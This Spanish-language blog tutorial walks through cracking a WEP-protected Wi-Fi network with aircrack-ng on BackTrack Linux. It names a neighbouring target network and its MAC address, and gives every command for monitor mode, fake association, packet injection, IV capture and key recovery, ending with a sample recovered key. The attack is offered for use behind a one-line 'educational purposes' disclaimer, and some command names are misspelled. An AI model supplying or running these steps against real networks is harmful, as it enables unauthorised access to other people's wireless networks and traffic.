Anteriormente en Linux RD habíamos hecho este mismo tutorial, ahora lo que hicimos fue ponerlo un poco mas simple y con gráficos.
Para este tutorial se necesita: un 10% de conocimiento en redes
un 20% de conocimiento en Linux
un 70% de entusiasmo y ganas
Antes que todo para este tutorial vamos a trabajar en Back Track Linux, ya que viene con el kernel preparado para este operativo ,lo bajamos y lo instalamos Live en un CD o USB. Nota: aircrack no bien funciona en las ultimas versiones de Ubuntu o Fedora.
Nota: nuestra tarjeta wireless debe de estar libre, osea no puede estar conectada a ninguna red, así que recomiendo que dejen cargada esta pagina y comenzamos:
1) Primero debemos ver las redes disponible en nuestro entorno y elegir la red con seguridad WEP , haciendo:
airodump-ng wlan0Luego que elijan presiones ctrl + c para dejar frisado y asi anotar los datos. La red que yo elegí fue Thomson0ADA39.

2) Ahora tenemos que poner nuestra tarjeta en modo monitor, sudo airmong-ng start wlan0 # de canal , fíjense en el canal donde dice CH. La red en mi caso que quiero romper esta en el canal 11:
Tomen en cuenta el monitor que elige, en nuestro caso fue mon0, esto puede variar dependiendo de cuantas veces lo hagamos y si desean detenerlo solo hagan airmong-ng stop wlan0airmong-ng start wlan0 11
3) Intentaremos asociarnos falsamente a la red wireless, aireplay-ng -1 0 -e 'nombre de la red' -a "Mac Address del Objetivo" -h "TU MAC address de wlan0" interfaz monitor ( seria mon0), Para saber nuestra Mac hacemos ifconfig wlan0 Nota: recuerda poner las '' y las "" donde lleven.
aireplay-ng -1 0 -e 'Thomson0ADA39' -a "00:26:44:08:75:37" -h "00:1e:64:6b:d0:4c" mon0Si este paso es exitoso saldra algo como esto:
Si no fue exitoso, pudo haber sido por varias razones: la señal esta muy lejos o cometiste algo error en los pasos anteriores.
4) Abrimos en una terminal y ponemos: aireplay-ng -3 -b "Mac Address Objetivo" -h "Tu MAC address" interfaz monitor, para lanzar ataques.
aireplay-ng -3 -b "00:26:44:08:75:37" -h "00:1e:64:6b:d0:4c" mon0
Abrimos otra y ponemos: airodump-ng --ivs -w "archivo-nombre" -c "canal" "interfaz monitor" ,esto es para la captura de paquetes ivs con lo que descifraremos la clave.
airodump-ng --ivs -w "captura" -c "11" "mon0"El dato mas importante es donde dice "DATA" ya que si se mueve muy rapido, mas fácil seria descifrar la clave.
5) Cuando hayan al menos 15 mil o 20 mil ivs (Initialization Vectors) pasaremos a descifrarla con aircrack-ng , esto puede tardar unas 8 horas , pero podemos ir probando cada 2 horas para ver si obtuvo la cantidad necesaria.
aircrack-ng -a 1 -f 2 *.ivs
Elegimos la red con numeraciones a la que queremos sacarle la clave , esperamos un rato a que haga el matcheo,Si tiene éxito la clave seria así:
KEY FOUND!! [ AA:BB:CC:DD:EE ] (notese que es en hexadecimal)
Que lo disfruten!!! esta de mas decirle que este tutorial es con fines educativo y cualquier irregularidad no somos responsables.
Posted by
Sol Tropical
0 comments:
Publicar un comentario